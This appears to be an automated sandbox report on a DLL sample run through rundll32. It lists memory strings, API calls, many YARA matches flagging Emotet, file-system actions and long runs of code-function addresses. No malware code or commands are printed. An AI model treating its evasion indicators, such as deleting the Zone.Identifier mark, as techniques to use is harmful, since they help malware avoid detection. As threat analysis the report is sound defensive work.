Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000011.00000003.462591154.00000125DAD90000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462696616.00000125DAD9A000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462672365.00000125DAD7E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462719021.00000125DADD0000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.462749971.00000125DADD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000011.00000003.463658536.00000125DAD7E000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 8_2_041818CA InternetReadFile,

8_2_041818CA

Source: loaddll32.exe, 00000000.00000002.350641355.0000000000FCB000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 2_2_10009963 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

2_2_10009963

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 8.2.rundll32.exe.4ce0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4cf0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5140000.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4ed0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4980000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.46f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.46f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4030000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4820000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dc0000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4cf0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4980000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4620000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.4030000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4090000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.49e0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.45f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.50c0000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4620000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ec0000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4bc0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5140000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4bc0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4820000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.49e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ec0000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.45f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.50c0000.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4090000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4dc0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4ed0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5130000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ce0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4b40000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5130000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.868792580.0000000004CE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349560826.0000000004B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349903901.0000000004CF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.349400359.00000000046F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350183619.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868395885.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868126623.0000000004090000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.869093007.00000000050C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.351790067.0000000004030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.867289690.0000000000670000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868949205.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350335367.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868865834.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868491768.0000000004980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.869173450.0000000005140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868282805.0000000004620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.348479056.00000000045F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868570789.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.350044975.0000000004E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.868675450.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: NjTYb3VyzV.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Xzrjbnqqcb\ruunnfqf.mlu:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Xzrjbnqqcb\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100141F1	2_2_100141F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1000B24B	2_2_1000B24B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10023277	2_2_10023277
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100145C5	2_2_100145C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100227EF	2_2_100227EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1002396F	2_2_1002396F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_100149D1	2_2_100149D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10013D1C	2_2_10013D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10022D33	2_2_10022D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10014DF1	2_2_10014DF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1001AE22	2_2_1001AE22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10024F42	2_2_10024F42
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04724410	2_2_04724410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047374A8	2_2_047374A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04738563	2_2_04738563
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472E6C7	2_2_0472E6C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473A049	2_2_0473A049
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04736349	2_2_04736349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04737C07	2_2_04737C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473FCD8	2_2_0473FCD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04730F1B	2_2_04730F1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472480A	2_2_0472480A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04723894	2_2_04723894
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047309F3	2_2_047309F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04734A72	2_2_04734A72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473FABB	2_2_0473FABB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472BA95	2_2_0472BA95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473F43B	2_2_0473F43B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04735406	2_2_04735406
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472D407	2_2_0472D407
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047424FA	2_2_047424FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047284B5	2_2_047284B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473848F	2_2_0473848F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472F574	2_2_0472F574
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473D530	2_2_0473D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047265A1	2_2_047265A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473E5A8	2_2_0473E5A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047275A9	2_2_047275A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04730610	2_2_04730610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473A614	2_2_0473A614
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473261D	2_2_0473261D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04726693	2_2_04726693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04722735	2_2_04722735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472F71C	2_2_0472F71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04728784	2_2_04728784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472F07C	2_2_0472F07C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472606B	2_2_0472606B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472C0E4	2_2_0472C0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473B0DD	2_2_0473B0DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472E09E	2_2_0472E09E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04742081	2_2_04742081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473708B	2_2_0473708B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473313F	2_2_0473313F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472226A	2_2_0472226A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472825D	2_2_0472825D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473D2E6	2_2_0473D2E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472E2D7	2_2_0472E2D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472A34E	2_2_0472A34E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047313D7	2_2_047313D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473B3B8	2_2_0473B3B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047393A0	2_2_047393A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04738389	2_2_04738389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473EC2D	2_2_0473EC2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04727C10	2_2_04727C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04734CF5	2_2_04734CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04735CA0	2_2_04735CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473BD6A	2_2_0473BD6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04724D32	2_2_04724D32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472ED39	2_2_0472ED39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473AD26	2_2_0473AD26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472DD02	2_2_0472DD02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04736DF8	2_2_04736DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473DDD1	2_2_0473DDD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04721DB2	2_2_04721DB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04725E78	2_2_04725E78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472CE30	2_2_0472CE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473CED5	2_2_0473CED5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04731F7B	2_2_04731F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473EF6D	2_2_0473EF6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472CF39	2_2_0472CF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472AFF0	2_2_0472AFF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473E84B	2_2_0473E84B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473584C	2_2_0473584C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047338F0	2_2_047338F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472C8D3	2_2_0472C8D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04739886	2_2_04739886
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04725973	2_2_04725973
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473F93D	2_2_0473F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472193C	2_2_0472193C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_047299D7	2_2_047299D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04738996	2_2_04738996
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0473D99C	2_2_0473D99C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04742A78	2_2_04742A78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04727A51	2_2_04727A51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472FA3C	2_2_0472FA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04737AF5	2_2_04737AF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_0472CAD5	2_2_0472CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04726B58	2_2_04726B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04731BB7	2_2_04731BB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_04741B95	2_2_04741B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04634A72	3_2_04634A72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04623894	3_2_04623894
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462226A	3_2_0462226A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462606B	3_2_0462606B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04625E78	3_2_04625E78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04642A78	3_2_04642A78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462F07C	3_2_0462F07C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463E84B	3_2_0463E84B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463A049	3_2_0463A049
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463584C	3_2_0463584C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04627A51	3_2_04627A51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462825D	3_2_0462825D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463EC2D	3_2_0463EC2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462CE30	3_2_0462CE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463F43B	3_2_0463F43B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462FA3C	3_2_0462FA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04637C07	3_2_04637C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04635406	3_2_04635406
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462D407	3_2_0462D407
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462480A	3_2_0462480A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04624410	3_2_04624410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04627C10	3_2_04627C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04630610	3_2_04630610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463A614	3_2_0463A614
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463261D	3_2_0463261D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463D2E6	3_2_0463D2E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462C0E4	3_2_0462C0E4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046338F0	3_2_046338F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04637AF5	3_2_04637AF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04634CF5	3_2_04634CF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046424FA	3_2_046424FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462E6C7	3_2_0462E6C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462C8D3	3_2_0462C8D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462E2D7	3_2_0462E2D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463CED5	3_2_0463CED5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462CAD5	3_2_0462CAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463FCD8	3_2_0463FCD8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463B0DD	3_2_0463B0DD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04635CA0	3_2_04635CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046374A8	3_2_046374A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046284B5	3_2_046284B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463FABB	3_2_0463FABB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04642081	3_2_04642081
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04639886	3_2_04639886
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463708B	3_2_0463708B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463848F	3_2_0463848F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04626693	3_2_04626693
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462BA95	3_2_0462BA95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462E09E	3_2_0462E09E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04638563	3_2_04638563
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463BD6A	3_2_0463BD6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463EF6D	3_2_0463EF6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04625973	3_2_04625973
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462F574	3_2_0462F574
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04631F7B	3_2_04631F7B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04636349	3_2_04636349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462A34E	3_2_0462A34E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04626B58	3_2_04626B58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463AD26	3_2_0463AD26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04624D32	3_2_04624D32
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463D530	3_2_0463D530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04622735	3_2_04622735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462ED39	3_2_0462ED39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462CF39	3_2_0462CF39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463313F	3_2_0463313F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463F93D	3_2_0463F93D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462193C	3_2_0462193C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462DD02	3_2_0462DD02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04630F1B	3_2_04630F1B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462F71C	3_2_0462F71C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046309F3	3_2_046309F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0462AFF0	3_2_0462AFF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04636DF8	3_2_04636DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463DDD1	3_2_0463DDD1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046313D7	3_2_046313D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046299D7	3_2_046299D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046265A1	3_2_046265A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046393A0	3_2_046393A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463E5A8	3_2_0463E5A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_046275A9	3_2_046275A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04621DB2	3_2_04621DB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04631BB7	3_2_04631BB7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463B3B8	3_2_0463B3B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04628784	3_2_04628784
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04638389	3_2_04638389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04641B95	3_2_04641B95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04638996	3_2_04638996
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0463D99C	3_2_0463D99C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04074A72	6_2_04074A72
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04063894	6_2_04063894
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04077C07	6_2_04077C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04075406	6_2_04075406
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406D407	6_2_0406D407
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406480A	6_2_0406480A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407A614	6_2_0407A614
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04064410	6_2_04064410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04067C10	6_2_04067C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04070610	6_2_04070610
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407261D	6_2_0407261D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407EC2D	6_2_0407EC2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406CE30	6_2_0406CE30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406FA3C	6_2_0406FA3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407F43B	6_2_0407F43B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407584C	6_2_0407584C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407E84B	6_2_0407E84B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0407A049	6_2_0407A049
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04067A51	6_2_04067A51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406825D	6_2_0406825D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406226A	6_2_0406226A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406606B	6_2_0406606B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04082A78	6_2_04082A78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0406F07C	6_2_0406F07C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04065E78	6_2_04065E78
